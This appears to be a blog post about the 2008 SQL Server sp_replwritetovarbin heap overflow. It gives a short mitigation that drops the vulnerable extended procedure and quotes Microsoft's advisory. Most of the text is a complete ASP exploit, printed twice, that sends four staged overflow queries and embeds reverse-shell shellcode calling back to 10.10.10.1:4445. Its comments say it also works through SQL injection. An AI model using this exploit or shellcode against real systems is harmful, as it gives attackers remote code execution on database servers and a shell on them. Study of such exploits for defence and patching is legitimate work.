There is publicly available code that exploits the sp_replwritetovarbin heap overflow bug.
In a default configuration, the sp_replwritetovarbin extended stored procedure is accessible to anyone. To disable this proc, run the following as an administrator on the box:
Before disabling this proc, read BradC's comment so that you do not break replication.

T-SQL
-- Mitigation for the sp_replwritetovarbin heap overflow: drop the vulnerable
-- extended stored procedure from the master database so it can no longer be
-- called. Run as an administrator on the affected instance.
-- Replication may depend on this proc (see BradC's comment in the post), so
-- confirm that before running it, and treat this as a stopgap until the
-- instance is on a version the Microsoft advisory lists as not affected.
execute master.dbo.sp_dropextendedproc 'sp_replwritetovarbin'
-- NOTE(review): the line below appears to be the page's duplicate rendering of
-- the statement above; the proc only needs to be dropped once.
execute master.dbo.sp_dropextendedproc 'sp_replwritetovarbin'

Microsoft is investigating new public reports of a vulnerability that could allow remote code execution on systems with supported editions of Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon). Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue.

Here are some more links
http://www.microsoft.com/technet/security/advisory/961040.mspx
http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx

Here is the code someone emailed me to test for the exploit

Visual Basic
// k`sOSe 12/17/2008
<%// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
// the change allows multiple shots 🙂
// 
// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.
 
// Take a look at the comments in T-SQL
 
 
 
On Error Resume Next
 
// change this
UserName = "r00t"
Password = "t00r"
 
// ########################################### FIRST QUERY
SQL = "DECLARE @buf NVARCHAR(4000),             "&_
"@val NVARCHAR(4),                      "&_
"@counter INT                           "&_
"SET @buf = '                           "&_ 
"declare @retcode int,                      "&_
"@end_offset int,                       "&_
"@vb_buffer varbinary,                      "&_
"@vb_bufferlen int                      "&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)                      "&_
"SET @counter = 0                       "&_
"WHILE @counter < 3020                      "&_
"BEGIN                              "&_
"  SET @counter = @counter + 1                  "&_
"  IF @counter = 2900                       "&_  
"  BEGIN                            "&_
"    SET @val =  CHAR(0x43)                 "&_
"  END                              "&_
"  ELSE IF @counter = 299                   "&_
"  BEGIN                            "&_
"    SET @val =  CHAR(0x42)                 "&_
"  END                              "&_
"  ELSE IF @counter = 300                   "&_
"  BEGIN                            "&_
 
 
"     /* First byte overwritten here. This is a random writable address */  "&_
"     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE                          "&_
"  END                              "&_
"  SET @buf = @buf + @val                   "&_
"END                                "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"                           
 
 
 
 
 
// ########################################### SECOND QUERY
SQL2 = "DECLARE @buf NVARCHAR(4000),                "&_
"@val NVARCHAR(4),                      "&_
"@counter INT                           "&_
"SET @buf = '                           "&_ 
"declare @retcode int,                      "&_
"@end_offset int,                       "&_
"@vb_buffer varbinary,                      "&_
"@vb_bufferlen int                      "&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)                      "&_
"SET @counter = 0                       "&_
"WHILE @counter < 3097                      "&_
"BEGIN                              "&_
"  SET @counter = @counter + 1                  "&_
"  IF @counter = 2900                       "&_  
"  BEGIN                            "&_
"    SET @val =  CHAR(0x43)                 "&_
"  END                              "&_
"  ELSE IF @counter = 299                   "&_
"  BEGIN                            "&_
"    SET @val =  CHAR(0x42)                 "&_
"  END                              "&_
"  ELSE IF @counter = 300                   "&_
"  BEGIN                            "&_
 
 
"     /* Second byte overwritten here */            "&_
"     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE                          "&_
"  END                              "&_
"  SET @buf = @buf + @val                   "&_
"END                                "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"                           
 
 
 
 
 
// ########################################### THIRD QUERY
SQL3 = "DECLARE @buf NVARCHAR(4000),                "&_
"@val NVARCHAR(4),                      "&_
"@counter INT                           "&_
"SET @buf = '                           "&_ 
"declare @retcode int,                      "&_
"@end_offset int,                       "&_
"@vb_buffer varbinary,                      "&_
"@vb_bufferlen int                      "&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)                      "&_
"SET @counter = 0                       "&_
"WHILE @counter < 3021                      "&_
"BEGIN                              "&_
"  SET @counter = @counter + 1                  "&_
"  IF @counter = 2900                       "&_  
"  BEGIN                            "&_
"    SET @val =  CHAR(0x43)                 "&_
"  END                              "&_
"  ELSE IF @counter = 299                   "&_
"  BEGIN                            "&_
"    SET @val =  CHAR(0x42)                 "&_
"  END                              "&_
"  ELSE IF @counter = 300                   "&_
"  BEGIN                            "&_
 
 
"     /* Third byte overwritten here */             "&_
"     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE                          "&_
"  END                              "&_
"  SET @buf = @buf + @val                   "&_
"END                                "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"                           
 
 
 
 
 
// ########################################### FOURTH QUERY
SQL4 = "DECLARE @buf NVARCHAR(4000),                "&_
"@val NVARCHAR(4),                      "&_
"@counter INT                           "&_
"SET @buf = '                           "&_ 
"declare @retcode int,                      "&_
"@end_offset int,                       "&_
"@vb_buffer varbinary,                      "&_
"@vb_bufferlen int                      "&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)                      "&_
"SET @counter = 0                       "&_
"WHILE @counter < 2708                      "&_
"BEGIN                              "&_
"  SET @counter = @counter + 1                  "&_
"  IF @counter = 2900                       "&_  
"  BEGIN                            "&_
"    SET @val =  CHAR(0x43)                 "&_
"  END                              "&_
"  IF @counter = 108                        "&_
"  BEGIN                            "&_
 
 
"     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */    "&_
"    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_
 
 
"     /* realign code */                        "&_
"    SET @buf = @buf + CHAR(0xe1)               "&_
 
 
"     /* realign the stack */                   "&_
"    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc) "&_
 
 
"     /* jump ahead */                      "&_
"    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
"    SET @counter = @counter + 12               "&_
"    CONTINUE                           "&_
"  END                              "&_
"  ELSE IF @counter = 299                   "&_
"  BEGIN                            "&_
"    SET @val =  CHAR(0x42)                 "&_
"  END                              "&_
"  ELSE IF @counter = 300                   "&_
"  BEGIN                            "&_
 
 
"     /* Fourth byte overwritten here */            "&_
"     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
 
 
"     /* reverse shell on 10.10.10.1:4445 */            "&_
"     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)
+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)
+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)
+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)
+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)
+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)
+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)
+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)
+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)
+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)
+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)
+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)
+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)
+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)
+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)
+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)
+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)
+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)
+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)
+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)
+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)
+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)
+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)
+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)
+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)
+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)
+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)
+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)
+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)
+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)
+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)
+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)
+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)      "&_
"     CONTINUE                          "&_
"  END                              "&_
"  SET @buf = @buf + @val                   "&_
"END                                "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"                           
 
 
Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")
 
phase = Request.Querystring("p")
 
if phase then
    if phase = 1 then
        rs.open SQL3, oConnection
        rs.close
        oConnection.Close
        Set oConnection = Nothing
        Response.Redirect("sql-exploit.asp?p=2")
    elseif phase = 2 then
        rs.open SQL4, oConnection
        rs.close
        oConnection.Close
        Set oConnection = Nothing
        Response.Redirect("sql-exploit.asp?p=3")
    end if
Else
    rs.open SQL, oConnection
    rs.close
    oConnection.Close
    Set oConnection = Nothing
    
    Set oConnection = Server.CreateObject("ADODB.Connection")
    oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
    Set rs = Server.CreateObject("ADODB.Recordset")
    rs.open SQL2, oConnection
    rs.close
    oConnection.Close
    Set oConnection = Nothing   
 
    Response.Redirect("sql-exploit.asp?p=1")
end if
 
 
%>
// k`sOSe 12/17/2008
<%// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
// the change allows multiple shots 🙂
// 
// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.

// Take a look at the comments in T-SQL



On Error Resume Next

// change this
UserName = "r00t"
Password = "t00r"

// ########################################### FIRST QUERY
SQL = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3020						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_


"     /* First byte overwritten here. This is a random writable address */	"&_
"     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							





// ########################################### SECOND QUERY
SQL2 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3097						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_


"     /* Second byte overwritten here */			"&_
"     SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							





// ########################################### THIRD QUERY
SQL3 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 3021						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_


"     /* Third byte overwritten here */				"&_
"     SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							





// ########################################### FOURTH QUERY
SQL4 = "DECLARE @buf NVARCHAR(4000),				"&_
"@val NVARCHAR(4),						"&_
"@counter INT							"&_
"SET @buf = '							"&_ 
"declare @retcode int,						"&_
"@end_offset int,						"&_
"@vb_buffer varbinary,						"&_
"@vb_bufferlen int						"&_  
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41)						"&_
"SET @counter = 0						"&_
"WHILE @counter < 2708						"&_
"BEGIN								"&_
"  SET @counter = @counter + 1					"&_
"  IF @counter = 2900						"&_	 
"  BEGIN							"&_
"    SET @val =  CHAR(0x43)					"&_
"  END								"&_
"  IF @counter = 108						"&_
"  BEGIN							"&_


"     /* this is the pointer we wrote - 0x38. It points to a CALL ECX */	"&_
"    SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_


"     /* realign code */						"&_
"    SET @buf = @buf + CHAR(0xe1)				"&_


"     /* realign the stack */					"&_
"    SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc)	"&_


"     /* jump ahead */						"&_
"    SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
"    SET @counter = @counter + 12				"&_
"    CONTINUE							"&_
"  END								"&_
"  ELSE IF @counter = 299					"&_
"  BEGIN							"&_
"    SET @val =  CHAR(0x42)					"&_
"  END								"&_
"  ELSE IF @counter = 300					"&_
"  BEGIN							"&_


"     /* Fourth byte overwritten here */			"&_
"     SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_


"     /* reverse shell on 10.10.10.1:4445 */			"&_
"     SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)
+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)
+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)
+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)
+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)
+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)
+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)
+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)
+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)
+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)
+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)
+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)
+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)
+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)
+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)
+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)
+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)
+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)
+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)
+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)
+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)
+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)
+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)
+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)
+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)
+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)
+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)
+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)
+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)
+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)
+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)
+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)
+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)
+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)		"&_
"     CONTINUE							"&_
"  END								"&_
"  SET @buf = @buf + @val					"&_
"END								"&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
"EXEC master..sp_executesql @buf"							


Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")

phase = Request.Querystring("p")

if phase then
	if phase = 1 then
		rs.open SQL3, oConnection
		rs.close
		oConnection.Close
		Set oConnection = Nothing
		Response.Redirect("sql-exploit.asp?p=2")
	elseif phase = 2 then
		rs.open SQL4, oConnection
		rs.close
		oConnection.Close
		Set oConnection = Nothing
		Response.Redirect("sql-exploit.asp?p=3")
	end if
Else
	rs.open SQL, oConnection
	rs.close
	oConnection.Close
	Set oConnection = Nothing
	
	Set oConnection = Server.CreateObject("ADODB.Connection")
	oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
	Set rs = Server.CreateObject("ADODB.Recordset")
	rs.open SQL2, oConnection
	rs.close
	oConnection.Close
	Set oConnection = Nothing	

	Response.Redirect("sql-exploit.asp?p=1")
end if


%>